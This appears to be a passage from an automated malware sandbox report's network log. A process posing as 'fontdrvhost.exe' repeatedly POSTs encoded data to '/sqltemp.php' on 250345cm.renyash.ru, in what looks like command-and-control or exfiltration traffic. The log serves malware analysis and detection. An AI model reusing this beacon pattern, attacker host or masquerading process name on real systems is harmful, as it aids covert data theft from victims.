                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:22.355564117 CET1012OUTData Raw: 56 53 5a 56 51 5c 54 51 58 56 52 59 56 5c 59 57 5b 53 54 58 55 5f 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VSZVQ\TQXVRYV\YW[STXU_P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X'?="/33;:-S!-/+<*<Z!2?Z*8&%??:&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:53:22.458761930 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:22.635010004 CET812INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:22 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1KoKX9nWtJJFnGjTBD0m%2FSO0%2FO9K2%2FXnCkE7a3w1Y4TK07ds7RkGzwM7O1eVc1ciVfSC7CtNXavO57hs8xWJ8J6csaOm%2FDkIT%2FwTCuKnseq75z%2FFPsWpfayXHtn%2FUoi0v6UVodUo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fec3194042d1-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3605&min_rtt=1709&rtt_var=4434&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=86472&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            105192.168.2.450034104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:22.742400885 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            106192.168.2.450036104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:22.759742975 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:23.105408907 CET1012OUTData Raw: 56 54 5a 53 51 5b 51 52 58 56 52 59 56 58 59 5f 5b 5d 54 5a 55 5b 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VTZSQ[QRXVRYVXY_[]TZU[P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-$/)Z7)$=(,:24-++:7>8Y4! (;>1/79:&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:53:23.213421106 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:23.479727030 CET809INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:23 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lGG7h0XpXCMcGbxd543lk7k71P9riLJbmb%2FvZ3NprbT0jWeoPuNlpCINxUwAIR%2FXdORo4JaufIITuh%2F8b7FiJiPdzXrnKgoZT%2FhlwXzWwaEcXPCO%2BLQtNBcwQkls3n3PI0NZOi3g"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fec7cebb4258-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3666&min_rtt=2247&rtt_var=3681&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=107352&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            107192.168.2.450042104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:23.603698015 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:23.949152946 CET1012OUTData Raw: 56 51 5f 54 51 5b 54 53 58 56 52 59 56 5d 59 53 5b 5f 54 50 55 5f 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQ_TQ[TSXVRYV]YS[_TPU_PUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Y3,)]7=\%>(8=78^<9+T*,4!?(;E&,'R.:&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:53:24.048075914 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:24.323241949 CET801INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:24 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5EzZy1cZVCnMPbYriIiAqH80vnAnrnLSEH5U8xZQKZpHx8ke8X8qm41SFlPQBNkDzHh%2Br2f4zEKogYB8zWopxSJVjckoequET2DJ9BWdLoDkJtJOHegRBc1gtoiaBY0Sf3h5wMyl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fecd082dc332-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7931&min_rtt=1668&rtt_var=13152&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=28198&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            108192.168.2.450048104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:24.447185040 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:24.792975903 CET1012OUTData Raw: 56 50 5f 52 51 58 54 57 58 56 52 59 56 5e 59 57 5b 5f 54 58 55 58 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VP_RQXTWXVRYV^YW[_TXUXP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'/]7,.3/\" [0_()'>=4Z!2?85%Y;-&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:24.909769058 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:25.082488060 CET804INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:25 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KPKbdoRVT0aSTMzq%2FbN7hWoY2cRUb5KfTrd%2B487IHNEvXo7lVpCbCgBigewRzdh5at2mF8Huv6ZCGkyJDOYmBm8%2BhxT3kK0uM0rTZPl5EuXNW0yCKtxteYX0baYrjw4dB6ECBEaN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fed26f2f43cf-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4230&min_rtt=1681&rtt_var=5728&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=66144&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            109192.168.2.450053104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:25.197386026 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:25.543051004 CET1012OUTData Raw: 56 50 5a 53 54 51 51 56 58 56 52 59 56 58 59 50 5b 58 54 51 55 5b 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VPZSTQQVXVRYVXYP[XTQU[P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0)Y#?)3#@.:9V4=(*)$>$]717Z+B2<<,:&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:53:25.659749031 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:25.829822063 CET807INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:25 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2FYnn5wxWPV3uCvuL8d4kd1crSsHZIS4QXXZdt4S9ToCz0GxgU2ChRW1%2Fci3tZVv8A4%2B5M1DjeW0c2Sd0OzTGlcHR5FDwhVWfHn0%2BkmdGso%2FwzXQqTy7ZfN69TDmnWTWHXwu5Foj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fed71faf4273-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4206&min_rtt=1677&rtt_var=5688&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=66627&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            110192.168.2.450058104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:25.950170040 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:26.308656931 CET1012OUTData Raw: 56 52 5f 56 51 58 54 54 58 56 52 59 56 5e 59 52 5b 5e 54 50 55 5e 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VR_VQXTTXVRYV^YR[^TPU^PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z3&7,"0>'8U4<Z+9;U==?##[+)%?9&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:26.393954992 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:26.564632893 CET803INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:26 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1LoZ953PszLO011RtsUXXSCPSq8L4VOkXUeHxu2s0Uty5UGodvgd%2BWbgDtN82Yhgoif83SSvlYf8d88cPaHgbZ7TECaMkuNgLOQFyq4UuG3T%2FmxXettsYE4IG1Vl8ZoZj5FLnvh7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fedba93b4225-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2523&min_rtt=1704&rtt_var=2277&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=176841&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            111192.168.2.450064104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:26.682040930 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:27.027513027 CET1012OUTData Raw: 53 55 5a 50 54 5a 51 51 58 56 52 59 56 58 59 5e 5b 5e 54 50 55 58 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SUZPTZQQXVRYVXY^[^TPUXP_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'5Y#Y>3>8"7><^?9+T>>] 2\<;%7-&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:53:27.135472059 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:27.395225048 CET807INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:27 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogsskodnV4plo30qJnsZj6A%2FcR00dz49AHITzB1Hh5Any7rYzKW85MD7wPqS91hGhGLV5UG7JjaiAi8wehRARTrgrYLEZmlNEZbmcqVPWy6IzIUvi224cjPjSAX%2F1mllfXs5%2FU%2F1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fee05bda1875-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2785&min_rtt=1485&rtt_var=3157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=122812&cwnd=152&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            112192.168.2.450070104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:27.527115107 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            113192.168.2.450072104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:27.784956932 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:28.136714935 CET1852OUTData Raw: 53 53 5a 57 51 5d 51 50 58 56 52 59 56 5d 59 55 5b 52 54 5e 55 5c 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SSZWQ]QPXVRYV]YU[RT^U\PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0Y% ]%.(/9T40^?*;T*./#"$?+=A&/'U9:&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:53:28.230123997 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:28.502389908 CET959INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:28 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0r2KBWlpIe%2Fn6EwioBNso95yxyAvhzOvUTNKGzG3a7qL3L%2FIAnWGJDGcX1ZrbnMirX526sB%2B7%2BFbFOsFBIB6sf8uhDttVBJk0M7TGyQg1pj2p7fam301F6lz0GIjBy%2FOsXzH70Z%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fee72a618ce3-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4976&min_rtt=1910&rtt_var=6849&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=55215&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 26 0d 28 2d 04 55 26 22 09 04 2b 2e 27 1f 25 2d 31 02 3f 06 08 59 30 3e 3b 5a 3d 3a 3f 5d 35 2c 31 5e 31 3b 20 5a 34 2d 38 06 24 24 2b 59 05 1c 20 0b 21 3f 3c 59 29 5b 27 1b 31 11 2a 00 26 2e 38 15 28 28 28 1f 37 2b 24 06 24 2e 3b 03 29 14 06 1d 30 3f 2b 5e 39 3f 25 10 24 3a 2c 54 00 11 26 51 24 1f 3c 59 20 27 38 11 22 31 13 5f 32 0a 0c 18 26 05 33 52 20 2a 2e 5d 31 54 2f 5b 21 20 39 03 26 2b 29 58 23 3e 23 18 3d 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98&(-U&"+.'%-1?Y0>;Z=:?]5,1^1; Z4-8$$+Y !?<Y)['1*&.8(((7+$$.;)0?+^9?%$:,T&Q$<Y '8"1_2&3R *.]1T/[! 9&+)X#>#=>%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            114192.168.2.450074104.21.38.84806324C:\Drivers\fontdrvhost.exe
